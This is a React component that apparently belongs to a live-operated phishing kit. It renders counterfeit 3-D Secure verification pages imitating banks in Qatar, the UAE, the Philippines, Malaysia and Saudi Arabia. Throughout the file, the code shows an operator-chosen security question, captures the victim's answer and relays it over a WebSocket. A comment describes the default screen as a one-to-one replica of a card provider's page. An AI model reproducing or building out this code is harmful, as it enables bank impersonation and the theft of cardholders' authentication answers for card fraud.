import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../utils/i18n';
import { isMastercard } from '../utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function QuestionPage({ config }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(mode);
  const [answer, setAnswer] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'ph_bdo';

  const isQatar = isQatarBankDesign(design);
  const bank = isQatar ? QATAR_BANKS[design] : null;
  const isMc = isMastercard(design);
  const isRtl = t.dir === 'rtl';

  const customQuestion = currentCommand?.message || localStorage.getItem('seq_quest') || (isRtl ? 'ما هو اسم مدرستك الابتدائية؟' : "What is your mother's maiden name?");

  const handleSubmit = (e) => {
    e.preventDefault();
    if (answer.trim() && !submitting) {
      setSubmitting(true);
      sendResponse('question_answer', { answer: answer.trim() });
    }
  };

  // 1. Qatar Bank Design
  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2. UAE Bank Design (ADIB / WIO / FAB)
  if (isUaeBankDesign(design)) {
    const isWio = design.includes('wio');
    const isFab = design.includes('fab');
    const uaeBank = isFab ? 'fab' : (isWio ? 'wio' : 'adib');
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onExit={() => navigate('/')}
      />
    );
  }

  // 2.5. Philippines Bank Design
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2.6. Malaysia Bank Design
  if (isMalaysiaBankDesign(design)) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2.7. KSA (Saudi Arabia) Bank Design
  if (isKsaBankDesign(design)) {
    return (
      <KsaBankLayout
        design={design}
        mode="question"
        customQuestion={customQuestion}
        answer={answer}
        setAnswer={setAnswer}
        handleQuestionSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 3. Standard 3DS Design (1:1 Replica of manual/providers/3ds/Question.jsx)
  return (
    <StandardCardLayout
      title={t.questionTitle}
      subtitle={t.questionSubtitle}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <form onSubmit={handleSubmit}>
        <div style={{
          background: '#f9fafb',
          border: '1px solid #e5e7eb',
          borderRadius: '6px',
          padding: '0.85rem 1rem',
          marginBottom: '1rem',
          fontWeight: 600,
          fontSize: '0.88rem',
          color: '#1f2937',
          textAlign: 'center'
        }}>
          {customQuestion}
        </div>

        <input
          type="text"
          value={answer}
          onChange={(e) => setAnswer(e.target.value)}
          placeholder={t.questionPlaceholder}
          className="scl-input"
          style={{ letterSpacing: 'normal', fontSize: '0.95rem' }}
          autoFocus
        />

        <div className="scl-link-row">
          <a
            href="#forgot-answer"
            onClick={(e) => { e.preventDefault(); alert(isRtl ? 'يرجى التواصل مع البنك المصدر للبطاقة للمساعدة في الإجابة على السؤال السري.' : 'Please contact your card issuing bank for assistance with your security question.'); }}
            className="scl-link"
          >
            {isRtl ? 'هل نسيت إجابة السؤال السري؟' : 'Forgot the answer to your security question?'}
          </a>
        </div>

        <div className="scl-btn-bar">
          <button
            type="button"
            onClick={() => navigate('/')}
            className="scl-cancel-btn"
          >
            {isRtl ? 'إلغاء' : 'Cancel'}
          </button>

          <button
            type="submit"
            disabled={!answer.trim() || submitting}
            className="scl-submit-btn"
          >
            {submitting ? <div className="inputLoader" /> : (isRtl ? 'إرسال' : 'Submit')}
          </button>

          <button
            type="button"
            onClick={() => alert(isRtl ? 'للمساعدة، يرجى التواصل مع البنك المصدر لبطاقتك.' : 'For assistance, please contact your card issuing bank.')}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {isRtl ? 'مساعدة' : 'Help'}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}
